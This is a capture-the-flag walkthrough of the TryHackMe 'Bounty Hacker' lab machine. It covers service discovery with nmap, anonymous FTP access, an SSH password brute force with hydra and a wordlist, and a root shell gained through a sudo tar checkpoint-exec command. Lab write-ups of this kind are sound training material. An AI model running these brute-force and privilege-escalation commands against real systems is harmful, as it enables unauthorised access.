Bounty Hacker
Room Covers:
Service Discovery
Local Privilege Escalation
Target Details
IP: 10.10.160.10
Service Discovery
Using nmap
nmap -sV -sC -Pn -oN scan.txt 10.10.160.10
Scan Results
# Nmap 7.92 scan initiated Thu Jun 30 12:36:54 2022 as: nmap -sC -sV -Pn -oN scan.txt 10.10.160.10 Nmap scan report for 10.10.160.10 Host is up (0.39s latency). Not shown: 967 filtered tcp ports (no-response), 30 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.x.x.x | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt |_-rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA) | 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA) |_ 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Jun 30 12:37:34 2022 -- 1 IP address (1 host up) scanned in 40.35 seconds
OS: Ubuntu
Services Found
ServicePortVersionHTTP
80
Apache/2.4.18
FTP
21
vsftpd 3.0.3
SSH
22
OpenSSH 7.2p2
Try Accessing FTP
Trying to access FTP anonymously
Connected to 10.10.160.10. 220 (vsFTPd 3.0.3) Name (10.10.160.10:attacker): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp>
We get successfully logged in as anonymous user
list and download files
# list files ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt -rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt 226 Directory send OK. ftp> # download all files ftp> mget * . # press return key whenever prompted to download
locks.txt
file appears to be a wordlist
Bruteforce SSH service
Assuming user to be lin from
task.txt
file, we bruteforce this account with downloadedlocks.txt
filehydra -l lin -P locks.txt ssh://10.10.160.10
Password: RedDr4gonxxxxxxxxx
We've successfully found the SSH password for user lin
Login to SSH
Login Details
UserPasswordlin
RedDr4gonxxxxxxxxx
Login to SSH using above details
ssh lin@10.10.160.10
Privilege Escalation
Find SUID files
find / -perm -u=s -type f 2>/dev/null
sudo
can be used by lin, hence to find commands that can be used by lin and executed as root, we run below commandsudo -l Matching Defaults entries for lin on bountyhacker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User lin may run the following commands on bountyhacker: (root) /bin/tar
/bin/tar
can be executed by lin as rootSearching for tar on GTFObins, we can escalate privileges using below command
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Machine is now rooted
# whoami root
Get Flags
User Flag
# cat /home/lin/Desktop/user.txt THM{CR1M3_xxxxxxxxx}
Root Flag
# cat /root/root.txt THM{80UN7Y_xxxxxx}
Last updated
Was this helpful?